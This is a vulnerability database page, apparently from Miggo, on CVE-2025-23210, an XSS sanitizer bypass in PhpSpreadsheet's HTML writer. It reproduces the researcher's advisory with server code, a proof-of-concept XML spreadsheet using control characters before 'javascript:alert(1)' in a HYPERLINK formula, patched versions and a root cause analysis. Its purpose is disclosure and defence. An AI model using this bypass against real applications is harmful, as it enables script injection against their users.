5.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-23210

GHSA ID

GHSA-r57h-547h-w24f

EPSS Score

0.30321%

CWE

CWE-79

Published

2/3/2025

Updated

3/6/2025

KEV Status

Technology

PHP

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-23210

CVE-2025-23210:
PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

Product: PhpSpreadsheet Version: 3.8.0 CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CVSS vector v.3.1: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) CVSS vector v.4.0: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N) Description: an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link Impact: executing arbitrary JavaScript code in the browser Vulnerable component: class PhpOffice\PhpSpreadsheet\Writer\Html, method generateRow Exploitation conditions: a user viewing a specially generated xml file Mitigation: additional sanitization of special characters in a string Researcher: Igor Sak-Sakovskiy (Positive Technologies)

Research

The researcher discovered zero-day vulnerability Bypass XSS sanitizer using the javascript protocol and special characters in Phpspreadsheet. The following code is written on the server, which translates the XML file into an HTML representation and displays it in the response.

Listing 4. Source code on the server

<?php

require __DIR__ . '/vendor/autoload.php';

$inputFileType = 'Xml';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);  

$inputFileName = './doc/file.xml';
$spreadsheet = $reader->load($inputFileName); 
 
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet); 
print($writer->generateHTMLAll());

The contents of the xml file - ./doc/file.xml

Listing 5. The contents of the xml file

<?xml version="1.0"?> 
<?mso-application progid="Excel.Sheet"?> 
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:o="urn:schemas-microsoft-com:office:office" 
 xmlns:x="urn:schemas-microsoft-com:office:excel" 
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" 
 xmlns:html="http://www.w3.org/TR/REC-html40"> 
 <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office"> 
  <Author>author</Author> 
  <LastAuthor>author</LastAuthor> 
  <Created>2015-06-05T18:19:34Z</Created> 
  <LastSaved>2024-12-25T10:16:07Z</LastSaved> 
  <Version>16.00</Version> 
 </DocumentProperties> 
 <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office"> 
  <AllowPNG/> 
 </OfficeDocumentSettings> 
 <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel"> 
  <WindowHeight>11020</WindowHeight> 
  <WindowWidth>19420</WindowWidth> 
  <WindowTopX>32767</WindowTopX> 
  <WindowTopY>32767</WindowTopY> 
  <ProtectStructure>False</ProtectStructure> 
  <ProtectWindows>False</ProtectWindows> 
 </ExcelWorkbook> 
 <Styles> 
  <Style ss:ID="Default" ss:Name="Normal"> 
   <Alignment ss:Vertical="Bottom"/> 
   <Borders/> 
   <Font ss:FontName="Calibri" x:Family="Swiss" ss:Size="11" ss:Color="#000000"/> 
   <Interior/> 
   <NumberFormat/> 
   <Protection/> 
  </Style> 
  <Style ss:ID="s16"> 
   <NumberFormat ss:Format="General Date"/> 
  </Style> 
 </Styles> 
 <Worksheet ss:Name="Лист1"> 
  <Table ss:ExpandedColumnCount="2" ss:ExpandedRowCount="6" x:FullColumns="1" 
   x:FullRows="1" ss:DefaultRowHeight="14.5"> 
   <Column ss:AutoFitWidth="0" ss:Width="194"/> 
   <Row> 
     <Cell ss:Formula="=HYPERLINK (CHAR(20) &amp; &quot;j&quot; &amp; CHAR(13) &amp; &quot;avascript:alert(1)&quot;)"><Data ss:Type="String"></Data></Cell> 
   </Row> 
  </Table> 
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel"> 
   <PageSetup> 
    <Header x:Margin="0.3"/> 
    <Footer x:Margin="0.3"/> 
    <PageMargins x:Bottom="0.75" x:Left="0.7" x:Right="0.7" x:Top="0.75"/> 
   </PageSetup> 
   <Selected/> 
   <TopRowVisible>1</TopRowVisible> 
   <Panes> 
    <Pane> 
     <Number>3</Number> 
     <ActiveRow>6</ActiveRow> 
    </Pane> 
   </Panes> 
   <ProtectObjects>False</ProtectObjects> 
   <ProtectScenarios>False</ProtectScenarios> 
  </WorksheetOptions> 
 </Worksheet>
</Workbook>

Due to the load with a special character in front of the javascript protocol, the execution flow hits line 1595, not 1593.

Figure 4. Generating a link bypassing a regular expression fig4

In the response from the server, you can see which special character is located in front of the javascript protocol after conversion.

Figure 5. Response from the server with a special character fig5

When viewing the rendered result, a link becomes visible in the browser, and when clicked, the embedded JavaScript code will be executed.

Figure 6. Executing JavaScript code <img width="595" alt="fig6" src="https://github.com/user-attachments/assets/b8ff1aeb-ba3b-49c1-a3b4-9e2cc1fc52d1" />

Credit

Igor Sak-Sakovskiy (Positive Technologies)

(GitHub Advisory)

5.4

CVSS Score

3.1

Basic Information

CVE ID

CVE-2025-23210

GHSA ID

GHSA-r57h-547h-w24f

EPSS Score

0.30321%

CWE

CWE-79

Published

2/3/2025

Updated

3/6/2025

KEV Status

Technology

PHP

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
phpoffice/phpspreadsheet	composer	>= 3.0.0, < 3.9.0	3.9.0
phpoffice/phpspreadsheet	composer	< 1.29.9	1.29.9
phpoffice/phpspreadsheet	composer	>= 2.2.0, < 2.3.7	2.3.7
phpoffice/phpspreadsheet	composer	>= 2.0.0, < 2.1.8	2.1.8
phpoffice/phpexcel	composer	<= 1.8.2

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from two key functions:

generateRow() in Html.php: The original regex failed to account for control characters in protocol validation, allowing attackers to bypass the XSS sanitizer by prefixing 'javascript:' with special characters. The commit explicitly patches this regex to include \x00-\x1f range.
setPath() in Drawing.php: The URL validation logic allowed protocols with control characters due to incomplete filtering. The patch adds regex checks to block these characters. Both functions were directly modified in the security commit (cde2926), and the vulnerability description explicitly references generateRow as the vulnerable component. The exploitation example uses XML hyperlinks with CHAR() functions to trigger the issue, which maps to these validation flaws.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

**Pro*u*t:** P*pSpr***s***t **V*rsion:** *.*.* ***W*-I*:** *W*-**: Improp*r N*utr*liz*tion o* Input *urin* W** P*** **n*r*tion ('*ross-sit* S*riptin*') ***VSS v**tor v.*.*:** *.* (*V:N/**:L/PR:L/UI:R/S:*/*:L/I:L/*:N) ***VSS v**tor v.*.*:** *.* (*V:N/

Reasoning

T** vuln*r**ility st*ms *rom two k*y *un*tions: *. **n*r*t*Row() in *tml.p*p: T** ori*in*l r***x **il** to ***ount *or *ontrol ***r**t*rs in proto*ol v*li**tion, *llowin* *tt**k*rs to *yp*ss t** XSS s*nitiz*r *y pr**ixin* 'j*v*s*ript:' wit* sp**i*l *

5.4

Basic Information

Concerned about an active attack path?

CVE-2025-23210: PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

Research

Credit

5.4

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2025-23210:
PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters

Vulnerability Intelligence
Miggo AI